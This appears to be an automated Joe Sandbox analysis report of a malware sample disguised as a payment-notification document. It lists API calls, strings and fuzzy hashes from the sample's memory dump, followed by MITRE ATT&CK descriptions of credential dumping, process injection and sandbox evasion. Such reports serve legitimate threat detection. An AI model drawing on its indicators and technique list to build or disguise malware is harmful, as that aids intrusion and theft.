Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: f7bb739a7394cdb32592f3cd22bfcd51f04a73872cdac239779b24d5d09f4f37
Instruction ID: 5d864e1e6771a6bc704d3112a46e84455ed6554b4c36e18f6e5dded219fa167e
Opcode Fuzzy Hash: f7bb739a7394cdb32592f3cd22bfcd51f04a73872cdac239779b24d5d09f4f37
Instruction Fuzzy Hash: 3F01C072A105278ACB20AFBDDC80DBF77A9FF627187510938E9A2961D0EB31DD40C652

Function 00941CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00941D4C

Strings

ListBox, xrefs: 00941D16
ComboBox, xrefs: 00941CEB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c840bf7787fea800cd10ccb9adc5138e6f2faa2dd88f3bb95280422acf8e387a
Instruction ID: a0ec848224502dc1f665e2e2cacf8fabc72852782b1caea7b02caffe6642fd07
Opcode Fuzzy Hash: c840bf7787fea800cd10ccb9adc5138e6f2faa2dd88f3bb95280422acf8e387a
Instruction Fuzzy Hash: AB01D8B1A41214AB8B18FFA4CC51DFE7368FB47350B140A19F862972D1EA7059488661

Function 00941BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00941C46

Strings

ListBox, xrefs: 00941C10
ComboBox, xrefs: 00941BE5

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 119b698586d46427b9659e5e02c6da2ad8fb1c24b4335a603aeee216627cffa4
Instruction ID: da48cc0bcd4bf2efa5a008c8ec055e667ff16aab2188bbf360c7136251e599ba
Opcode Fuzzy Hash: 119b698586d46427b9659e5e02c6da2ad8fb1c24b4335a603aeee216627cffa4
Instruction Fuzzy Hash: 3C01A77578111867CB18FBA4CD92EFF77ACEB52341F140419E886A7281EA649F48C6B2

Function 00941C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00941CC8

Strings

ListBox, xrefs: 00941C94
ComboBox, xrefs: 00941C69

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: b422006541000eed97422a95b7197adf0ee91db64ee238aba0bdd283746c0c5f
Instruction ID: 87068d18fe16c69a111eeaa11afd354a2eeab63989dc265aa6871f2ceacb8907
Opcode Fuzzy Hash: b422006541000eed97422a95b7197adf0ee91db64ee238aba0bdd283746c0c5f
Instruction Fuzzy Hash: E901D6B179011867CB14FBA5CE91EFE73ACAB12341F540419BC82B3281FA609F48C6B2

Function 00941D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00941DD3

Strings

ListBox, xrefs: 00941DA0
ComboBox, xrefs: 00941D75

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e43f43d96ff5c0878938a46d24287f24002128e7e3175a41893b7f105a8f035e
Instruction ID: 714184f2bade47b9b643e7f5f6fd796d06123c14f64bdfe1bc6c793276b9a935
Opcode Fuzzy Hash: e43f43d96ff5c0878938a46d24287f24002128e7e3175a41893b7f105a8f035e
Instruction Fuzzy Hash: CEF0A4B1F5121466DB14F7A9CC92FFE776CFB42350F540D19F862A32C1EAA05A4882A1

Function 0096747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00967493
_wcslen.LIBCMT ref: 009674B9

Strings

3, 3, 16, 1, xrefs: 00967483

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
Instruction ID: 70eb26b633ca3eda494f64afb3339bbb43c4610a60050b2bf3a28065de0911e5
Opcode Fuzzy Hash: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
Instruction Fuzzy Hash: 14E02B4220522014D23112BAACC5B7FD68ECFC5F90710183BFE81C22BAEE948D9193A1

Function 00940B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00940B23

Strings

AutoIt, xrefs: 00940B17
Error allocating memory., xrefs: 00940B1C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 9e7653ac133c81cc954e7b1aeebec0c5c57e64e5a0a3731b2732ffae3322ef58
Instruction ID: b9d84d7a6bb80fead54510ae23419fbd2ed667e62fc21a9e55d91ad0cf092697
Opcode Fuzzy Hash: 9e7653ac133c81cc954e7b1aeebec0c5c57e64e5a0a3731b2732ffae3322ef58
Instruction Fuzzy Hash: 7AE0D8733443082AD21436587C03F897A84DF45B54F10442EF78CD94C38AE1249006EA

Function 00900D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00900D71,?,?,?,008E100A), ref: 008FF7CE

IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 00900D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 00900D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00900D7F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
Instruction ID: 19a1d949961e509047e756cf31c3a044eb965aab9b8ce41590551346caeb41e7
Opcode Fuzzy Hash: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
Instruction Fuzzy Hash: 2AE06DB12007418FD7309FB8E8043467BE4BF40744F00892DE49AC6692EBB0E4888BA2

Function 00953017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0095302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00953044

Strings

aut, xrefs: 00953038

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
Instruction ID: 47da988782df8b08e7e327ec00b4eba3b063bf2778b7a173e279acf8fce7626a
Opcode Fuzzy Hash: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
Instruction Fuzzy Hash: 2CD05EB350032877DB20A7A4AC0EFCB3A6CDB05750F4002A1B669E2096DAB0DA84CBD0

Function 0093D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0093D220

Strings

%.3d, xrefs: 0093D22B
X64, xrefs: 0093D2A8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
Instruction ID: 519608edb77107da452723280d53968071e97ae755539fa458becd72c00c65c6
Opcode Fuzzy Hash: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
Instruction Fuzzy Hash: 1DD012A280A10CE9CB9096E0EC558BBB37CFB48301F608852FA26D1041DA38D548AF62

Function 00972322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0097233F

Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3

Strings

Shell_TrayWnd, xrefs: 00972325

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
Instruction ID: be4a1eaddaf32935ac970b04a8f08abf6083f6c34c9bddb4a49a0682c0bc37fb
Opcode Fuzzy Hash: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
Instruction Fuzzy Hash: 92D012773A8310B7E764B770DC4FFC67A14AB40B14F01491EB749AA1D0C9F0A841DA54

Function 00972356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097236C
PostMessageW.USER32(00000000), ref: 00972373

Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3

Strings

Shell_TrayWnd, xrefs: 00972365

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
Instruction ID: 54f39d3020dc268e137434a00d948b016fd43724d59caa25d004a7240a7281f0
Opcode Fuzzy Hash: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
Instruction Fuzzy Hash: 47D0C9723A9310BAE664A7709C4FFC66614AB45B14F01491AB649AA1D0C9A0A8419A58

Function 0091BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0091BE93
GetLastError.KERNEL32 ref: 0091BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091BEFC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
Instruction ID: b4e0f1f721fed9c94975dd1900cd8bf655570e44c4ecf94c663e49ed0cee0fdf
Opcode Fuzzy Hash: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
Instruction Fuzzy Hash: 2C41EA3570420AAFCF21AF65CC54BFA7BAAEF41720F144169F959972E1DB308D82DB90

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
